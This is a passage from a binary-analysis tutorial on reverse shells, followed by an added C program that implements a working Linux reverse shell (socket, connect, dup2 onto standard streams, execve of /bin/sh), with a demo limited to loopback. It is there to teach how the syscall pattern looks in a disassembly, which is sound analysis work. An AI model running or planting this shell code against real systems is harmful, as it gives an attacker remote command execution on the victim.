Analyzing a Simple Reverse Shell

In the previous chapter, we analyzed a potentially malicious binary that opened a socket; bound that socket to localhost on port 4444/TCP; listened; accepted a connection; duplicated the accepted socket onto standard input, output, and error; and then executed /bin/bash. That bind-shell recipe was a good introduction to analyzing malicious binaries, but it's time we stepped it up a notch. Most systems nowadays run on 64-bit processors, and malicious users often prefer to have the victim host connect back to a listening host they control rather than leaving a port open on the victim. As a penetration tester myself, I prefer reverse connections whenever possible, especially when I have the command and control infrastructure set up effectively. Don't get me wrong, ...
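As an added example that is not code from Binary Analysis Cookbook, the following C program is the connect-back counterpart of the bind shell recipe summarized above: socket, connect, three dup2 calls, execve. Seeing the source makes that call sequence easy to recognise in the disassembly of a reverse-shell binary. The listener address and port, the choice of /bin/sh as the shell, and the loopback demo in main are all assumptions made for this example; reverse_shell only returns when something fails before execve, which is what the test below relies on.

```c
/*
 * Added example, not from the book: a minimal Linux/POSIX reverse shell.
 * Call sequence to look for in a disassembly: socket -> connect ->
 * dup2(fd, 0/1/2) -> execve("/bin/sh").  Target ip/port are assumptions.
 */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fill in a sockaddr_in for the attacker's listener.  Returns 0 on success,
 * -1 if ip is not a valid dotted-quad IPv4 address. */
int make_addr(const char *ip, uint16_t port, struct sockaddr_in *sa)
{
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;
    sa->sin_port = htons(port);            /* network byte order: 4444 -> 0x115c */
    return inet_pton(AF_INET, ip, &sa->sin_addr) == 1 ? 0 : -1;
}

/* Connect back to ip:port, wire the socket to stdin/stdout/stderr and exec
 * a shell.  Only returns (with -1) if something fails before execve. */
int reverse_shell(const char *ip, uint16_t port, const char *shell)
{
    struct sockaddr_in sa;
    if (make_addr(ip, port, &sa) < 0)
        return -1;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
        close(fd);
        return -1;                         /* no listener: ECONNREFUSED on loopback */
    }
    /* Same three dup2 calls the bind shell made on its accepted socket. */
    dup2(fd, STDIN_FILENO);
    dup2(fd, STDOUT_FILENO);
    dup2(fd, STDERR_FILENO);
    if (fd > STDERR_FILENO)
        close(fd);
    char *const argv[] = { (char *)shell, NULL };
    execve(shell, argv, NULL);
    return -1;                             /* execve failed */
}

/* Demo helper: open a loopback listener on a kernel-chosen port and report
 * that port.  Returns the listening fd or -1. */
int loopback_listener(uint16_t *port_out)
{
    int lfd = socket(AF_INET, SOCK_STREAM, 0);
    if (lfd < 0)
        return -1;
    struct sockaddr_in sa;
    make_addr("127.0.0.1", 0, &sa);
    if (bind(lfd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(lfd, 1) < 0) {
        close(lfd);
        return -1;
    }
    socklen_t len = sizeof sa;
    getsockname(lfd, (struct sockaddr *)&sa, &len);
    *port_out = ntohs(sa.sin_port);
    return lfd;
}

/* Demo: the parent plays the attacker's listener, a forked child plays the
 * victim, and one command is pushed through the shell over loopback. */
int main(void)
{
    uint16_t port;
    int lfd = loopback_listener(&port);
    if (lfd < 0)
        return 1;
    pid_t pid = fork();
    if (pid == 0) {
        close(lfd);
        reverse_shell("127.0.0.1", port, "/bin/sh");
        _exit(127);                        /* only reached if connect/exec failed */
    }
    int cfd = accept(lfd, NULL, NULL);
    const char cmd[] = "echo connected-from-pid-$$\nexit\n";
    if (write(cfd, cmd, sizeof cmd - 1) < 0)
        return 1;
    char buf[128] = {0};
    ssize_t n = read(cfd, buf, sizeof buf - 1);
    printf("victim said: %s", n > 0 ? buf : "(nothing)\n");
    close(cfd);
    close(lfd);
    waitpid(pid, NULL, 0);
    return 0;
}
```

When analyzing a stripped 64-bit binary, the same pattern shows up as a socket/connect/dup2/dup2/dup2/execve syscall chain with the port constant already in network byte order, so 4444 appears as 0x115c in the sockaddr setup.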
